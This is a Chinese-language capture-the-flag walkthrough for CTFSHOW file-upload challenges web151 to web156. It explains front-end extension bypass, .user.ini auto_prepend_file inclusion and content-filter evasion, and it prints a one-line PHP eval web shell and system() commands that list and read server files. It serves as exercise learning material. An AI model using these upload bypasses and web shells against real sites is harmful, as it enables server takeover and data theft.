CTFSHOW 文件上传

web151  JS前端绕过

CTFSHOW 文件上传_第1张图片

 直接上传 png的图片马

然后抓包修改为php

a=system("ls /var/www/html");

CTFSHOW 文件上传_第2张图片

a=system("cat /var/www/html/flag.php");

 web152

和151一样的方法也可以实现上传

CTFSHOW 文件上传_第3张图片

a=system("ls /var/www/html");
a=system("cat /var/www/html/flag.php");

 

web153   .user.ini

 CTFSHOW 文件上传_第4张图片

用之前的方式无法上传 我们使用其他后缀名看看

 CTFSHOW 文件上传_第5张图片

但是无法解析 访问就直接下载了 这个时候 我们可以使用 .user. ini

因为服务器是 nginx所以可以使用

auto_prepend_file = easy.png

解析 easy.png

先上传 user 发现有前端 那么我们就修改为 png

CTFSHOW 文件上传_第6张图片

CTFSHOW 文件上传_第7张图片

然后直接上传 easy.png

因为我们访问 upload目录的时候 会显示

说明存在index.php首页

所以我们通过 .user.ini 将 easy.png 类似 include进 index.php

进行解析 这样就会访问到我们的一句话木马

然后 我们访问/upload/index.php

a=system("ls /var/www/html");

a=system("cat /var/www/html/flag.php");

 web154  判断内容检测 ,短标签

 这里只是上传 png就报错

说明存在内容检测 多半是php格式的检测

我们可以使用其他的


 

 
<% eval($_POST[1]);%>

 CTFSHOW 文件上传_第8张图片

那我们看看能不能还可以使用 .user.ini

 依然可以

web155

使用上面的方法还是可以

web156

CTFSHOW 文件上传_第9张图片

 发现又对内容进行过滤了

经过排查 发现是对 [] 进行过滤了 所以我们直接使用 {}即可绕过

你可能感兴趣的:(android)